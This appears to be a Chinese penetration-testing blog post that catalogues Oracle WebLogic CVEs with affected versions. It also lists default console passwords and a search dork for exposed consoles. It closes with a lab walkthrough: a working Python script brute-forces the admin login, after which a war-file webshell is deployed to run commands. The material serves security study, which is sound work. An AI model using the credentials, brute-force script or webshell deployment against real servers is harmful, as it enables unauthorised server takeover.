Weblogic相关漏洞

目录

Weblogic

Weblogic出现过的漏洞

SSRF(CVE-2014-4210)  

任意文件上传(CVE-2018-2894)

RCE漏洞

CVE-2015-4852  

CVE-2016-0638  

CVE-2016-3510   

CVE-2017-3248  

CVE-2017-3506

Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

CVE-2018-2893  

CVE-2019-2725

CVE-2019-2729

Weblogic远程代码执行漏洞(CVE-2020-2546)

Weblogic IIOP反序列化漏洞(CVE-2020-2551)

Weblogic远程代码执行漏洞(CVE-2020-14645)

Weblogic Console远程代码执行漏洞(CVE-2020-14882)

CVE-2021-2109 Weblogic Server远程代码执行

Weblogic后台部署war包getshell


Weblogic

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVA EE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

WebLogic是Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java EE应用服务器软件之一,也是世界上第一个成功商业化的Java EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。

默认端口:7001 、7002

Google关键字:WebLogic Server Administration Console inurl:console

常见默认口令:

  • 用户名:system          密码:password
  • 用户名:weblogic       密码:weblogic 
  • 用户名:admin           密码:security
  • 用户名:portadmin     密码:portadmin
  • 用户名:joe                密码:password
  • 用户名:mary             密码:password
  • 用户名:system          密码:security
  • 用户名:system          密码:system
  • 用户名:wlcsystem      密码:wlcsystem
  • 用户名:wlpisystem     密码:wlpisystem
  • 用户名:guest             密码:guest

常见的Weblogic版本

  • WebLogic Server 14c(14.1.1.0.0)-2020年4月3日
  • WebLogic Server 12c(12.1.1) - 2012年3月6日
  • WebLogic Server 12c(12.0) - 2011年12月1日
  • WebLogic Server 11gR1 PS5 (10.3.6) - 2012年2月23日
  • WebLogic Server 11gR1 PS4 (10.3.5) - 2011年5月6日
  • WebLogic Server 11gR1 PS3 (10.3.4) - 2011年1月15日
  • WebLogic Server 11gR1 PS2 (10.3.3) - 2010年四月
  • WebLogic Server 11gR1 PS1 (10.3.2) - 2009年11月
  • WebLogic Server 11g (10.3.1) - 2009年7月
  • WebLogic Server 10.3 - 2008年8月(J2EE6支持)
  • WebLogic Server 10.0 - 2007年3月(J2EE5支持)
  • WebLogic Server 9.2.4 - 2010年7月22(主要提升管理和运行管理的功能)
  • WebLogic Server 9.1
  • WebLogic Server 9.0 - 【Diablo】 2006年11月
  • WebLogic Server 8.1 -2003年7月发行到2004年8月为成熟版本,也已不再支持
  • WebLogic Server 7.0 -2002年6月发行但是BEA公司推荐放弃使用。
  • WebLogic Server 6.1 - 从November 2006不再支持
  • WebLogic Server 6.0 - 2001年3月,从April 2003不再支持
  • WebLogic Server 5.1 - (代码名: Denali) 第一个支持热部署技术的版本(通过命令行)
  • WebLogic Server 4.0 - 1999年
  • WebLogic Tengah 3.1 - 1998年6月
  • WebLogic Tengah 3.0.1 - 1998年3月
  • WebLogic Tengah 3.0 - 1998年1月
  • WebLogic Tengah - 1997年11月

Weblogic出现过的漏洞

SSRF(CVE-2014-4210)  

漏洞描述:Oracle融合中间件10.0.2.0和10.3.6.0中Oracle WebLogic Server组件中未指定的漏洞允许远程攻击者通过与WLS-Web服务相关的向量影响机密性。

影响版本:10.0.2.0、10.3.6.0

漏洞标志:uddiexploer

相关文章:Weblogic SSRF漏洞(CVE-2014-4210)

任意文件上传(CVE-2018-2894)

漏洞描述:Oracle融合中间件的Oracle WebLogic Server组件(子组件:WLS-Web服务)中的漏洞。受影响的支持版本是12.1.3.0、12.2.1.2和12.2.1.3。容易攻击的漏洞允许未经身份验证的攻击者通过HTTP进行网络访问,从而危及Oracle WebLogic Server。成功攻击此漏洞可导致接管Oracle WebLogic Server。CVSS3.0基础得分9.8(保密性、完整性和可用性影响)。

影响版本:12.1.3.0、12.2.1.2和12.2.1.3

相关文章:Weblogic 任意文件上传漏洞(CVE-2018-2894)

RCE漏洞

CVE-2015-4852  

漏洞描述:Oracle WebLogic Server 10.3.6.0、12.1.2.0、12.1.3.0和12.2.1.0中的WLS安全组件允许远程攻击者在与oracle_common/modules/com.bea.core.apache.commons.collections.jar.相关的T3协议流量中通过精心编制的序列化Java对象执行任意命令。注意:此CVE的范围仅限于WebLogicServer产品

影响版本:10.3.6.0、12.1.2.0、12.1.3.0和12.2.1.0

CVE-2016-0638  

漏洞描述:Oracle Fusion中间件中的Oracle WebLogic Server组件中未指定的漏洞10.3.6、12.1.2、12.1.3和12.2.1允许远程攻击者通过与Java消息传递服务相关的向量影响机密性、完整性和可用性。

影响版本:10.3.6、12.1.2、12.1.3和12.2.1

CVE-2016-3510   

漏洞描述:Oracle Fusion中间件中的Oracle WebLogic Server组件中未指定的漏洞10.3.6.0、12.1.3.0和12.2.1.0允许远程攻击者通过与WLS核心组件相关的向量影响机密性、完整性和可用性,这与CVE-2016-3586不同。

影响版本:10.3.6.0、12.1.3.0和12.2.1.0

CVE-2017-3248  

漏洞描述:Oracle融合中间件的Oracle WebLogic Server组件(子组件:核心组件)中的漏洞。受影响的支持版本为10.3.6.0、12.1.3.0、12.2.1.0和12.2.1.1。容易攻击的漏洞允许未经身份验证的攻击者通过T3进行网络访问,从而危及Oracle WebLogic Server。成功攻击此漏洞可导致接管Oracle WebLogic Server。

影响版本:10.3.6.0、12.1.3.0、12.2.1.0和12.2.1.1

CVE-2017-3506

漏洞描述:Oracle融合中间件(子组件:Web服务)的Oracle WebLogic Server组件中的漏洞。受影响的支持版本为10.3.6.0、12.1.3.0、12.2.1.0、12.2.1.1和12.2.1.2。难以攻击的漏洞允许未经身份验证的攻击者通过HTTP进行网络访问,从而危及Oracle WebLogic Server。对此漏洞的成功攻击可能导致对关键数据或所有Oracle WebLogic Server可访问数据的未经授权的创建、删除或修改访问,以及对关键数据的未经授权访问或对所有Oracle WebLogic Server可访问数据的完全访问。CVSS3.0基础得分7.4(保密性和完整性影响)。

影响版本:10.3.6.0、12.1.3.0、12.2.1.0、12.2.1.1和12.2.1.2

Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)

漏洞描述:Oracle融合中间件的Oracle WebLogic Server组件中的漏洞(子组件:WLS安全性)。受影响的支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.1.0和12.2.1.2.0。容易攻击的漏洞允许未经身份验证的攻击者通过T3进行网络访问,从而危及Oracle WebLogic Server。成功攻击此漏洞可导致接管Oracle WebLogic Server。

影响版本:10.3.6.0.0、12.1.3.0.0、12.2.1.1.0和12.2.1.2.0

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

漏洞描述:Oracle融合中间件的Oracle WebLogic Server组件(子组件:WLS核心组件)中的漏洞。受影响的支持版本为10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3。容易攻击的漏洞允许未经身份验证的攻击者通过T3进行网络访问,从而危及Oracle WebLogic Server。成功攻击此漏洞可导致接管Oracle WebLogic Server。

影响版本:10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3

CVE-2018-2893  

漏洞描述:Oracle融合中间件的Oracle WebLogic Server组件(子组件:WLS核心组件)中的漏洞。受影响的支持版本为10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3。容易攻击的漏洞允许未经身份验证的攻击者通过T3进行网络访问,从而危及Oracle WebLogic Server。成功攻击此漏洞可导致接管Oracle WebLogic Server。

影响版本:10.3.6.0、12.1.3.0、12.2.1.2和12.2.1.3

CVE-2019-2725

漏洞描述:Oracle融合中间件(子组件:Web服务)的Oracle WebLogic Server组件中的漏洞。受影响的支持版本是10.3.6.0.0和12.1.3.0.0。容易攻击的漏洞允许未经身份验证的攻击者通过HTTP进行网络访问,从而危及Oracle WebLogic Server。成功攻击此漏洞可导致接管Oracle WebLogic Server。

影响版本:10.3.6.0.0和12.1.3.0.0

CVE-2019-2729

漏洞描述:Oracle融合中间件(子组件:Web服务)的Oracle WebLogic Server组件中的漏洞。受影响的支持版本为10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。容易攻击的漏洞允许未经身份验证的攻击者通过HTTP进行网络访问,从而危及Oracle WebLogic Server。成功攻击此漏洞可导致接管Oracle WebLogic Server。CVSS3.0基础得分9.8(保密性、完整性和可用性影响)。

影响版本:10.3.6.0.0、12.1.3.0.0和12.2.1.3.0

Weblogic远程代码执行漏洞(CVE-2020-2546)

漏洞描述:该漏洞通过T3协议实现利用、攻击者可通过此漏洞实现远程代码执行,CVSS评分均为9.8。利用复杂度低

影响版本:WebLogic Server 10.3.6.0.0 、WebLogic Server 12.1.3.0.0

Weblogic IIOP反序列化漏洞(CVE-2020-2551)

漏洞描述:该漏洞可以绕过Oracle官方在2019年10月份发布的最新安全补丁。攻击者可以通过IIOP协议远程访问Weblogic Server服务器上的远程接口,传入恶意数据,从而获取服务器权限并在未授权情况下远程执行任意代码。IIOP协议以Java接口的形式对远程对象进行访问,默认启用。

影响版本: 10.3.6.0.0 、12.1.3.0.0 、12.2.1.3.0 、12.2.1.4.0

相关文章:Weblogic IIOP反序列化漏洞(CVE-2020-2551) 漏洞分析

Weblogic远程代码执行漏洞(CVE-2020-14645)

参考文章:WebLogic远程代码执行漏洞(CVE-2020-14645)风险通告

Weblogic Console远程代码执行漏洞(CVE-2020-14882)

影响版本:

  • Oracle WeblogicServer 10.3.6.0.0
  • Oracle WeblogicServer 12.1.3.0.0
  • Oracle WeblogicServer 12.2.1.3.0
  • Oracle WeblogicServer 12.2.1.4.0
  • Oracle WeblogicServer 14.1.1.0.0

相关文章:CVE-2020-14882 Weblogic Console远程代码执行漏洞复现

CVE-2021-2109 Weblogic Server远程代码执行

影响版本:

  • Weblogic Server 10.3.6.0.0
  • Weblogic Server 12.1.3.0.0
  • Weblogic Server 12.2.1.3.0
  • Weblogic Server 12.2.1.4.0
  • Weblogic Server 14.1.1.0.0

相关文章:CVE-2021-2109 Weblogic Server远程代码执行复现

Weblogic后台部署war包getshell

访问网站:   http://192.168.10.129:7001/

访问后台登录处,http://192.168.10.129:7001/console/login/LoginForm.jsp

使用如下脚本爆破

import requests

url = "http://192.168.10.129"
pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
for user in pwddict:
    for pwd in pwddict:
        data = {
                'j_username':user,
                'j_password':pwd,
                'j_character_encoding':'UTF-8'
                }
        req = requests.post(url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False)
        if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
            print('[+] WebLogic username: '+user+'  password: '+pwd)

如下,爆破得到账号密码:WebLogic   Oracle@123

登录进后台

点击部署——>安装

点击上传文件

部署本地生成好的 war 包,下一步

部署成功

下一步

下一步

完成

如下,部署成功

访问木马执行命令

相关文章: Weblogic漏洞——从入门到放弃

                   weblogic漏洞总结

                   缝缝补补的WebLogic:绕过的艺术

### 回答1: WebLogic是Oracle公司的一个Java应用服务器,常用于企业级应用的开发和部署。由于其广泛的应用,WebLogic也成为了攻击者的目标之一。其中最常见的漏洞包括: 1. CVE-2019-2725:WebLogic WLS组件存在远程代码执行漏洞,攻击者可以利用此漏洞通过发送精心构造的HTTP请求,远程执行任意代码。 2. CVE-2020-14882:WebLogic Server Console 组件存在远程代码执行漏洞,攻击者可以通过发送特殊构造的HTTP请求,远程执行任意代码。 3. CVE-2018-2628:WebLogic Server 组件存在远程代码执行漏洞,攻击者可以通过发送精心构造的T3请求,远程执行任意代码。 这些漏洞都可以导致攻击者远程执行任意代码,造成严重的安全风险。如果您使用WebLogic,请务必及时升级到最新版本,并采取安全措施来保护您的系统。 ### 回答2: WebLogic组件漏洞是指WebLogic服务器软件中存在的安全漏洞WebLogic是一种常用的Java EE应用服务器,它提供了许多组件和功能来帮助开发人员构建和部署企业级应用程序。 WebLogic组件漏洞可能导致未经授权的访问、拒绝服务攻击和远程代码执行等问题。这些漏洞可以被黑客利用,进而破坏系统的机密性、完整性和可用性。 为了保护系统免受WebLogic组件漏洞影响,首先应该及时关注和安装厂商发布的安全补丁。这些安全补丁可以修复已知的漏洞并提供额外的安全措施。 此外,还应加强访问控制,限制对WebLogic服务器的访问权限。例如,只允许受信任的主机和IP地址访问服务器,并使用密码和证书等方式确保身份验证和安全连接。 网络安全监测和防御机制也是非常重要的。通过使用防火墙、入侵检测系统和安全信息和事件管理系统等工具,可以检测和阻止潜在的攻击,并提供及时的安全警报和日志记录。 最后,开发和应用安全性最佳实践也是防止WebLogic组件漏洞的关键。这包括减少使用默认配置、禁用不必要的组件和服务、实施强密码策略、定期进行安全审计和漏洞扫描、以及培训和教育开发人员和管理员等。 综上所述,WebLogic组件漏洞是一个严重的安全威胁,但通过及时安装安全补丁、加强访问控制、实施安全监测和防御机制,并按照最佳实践开发和应用安全措施,可以最大程度地降低漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢公子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值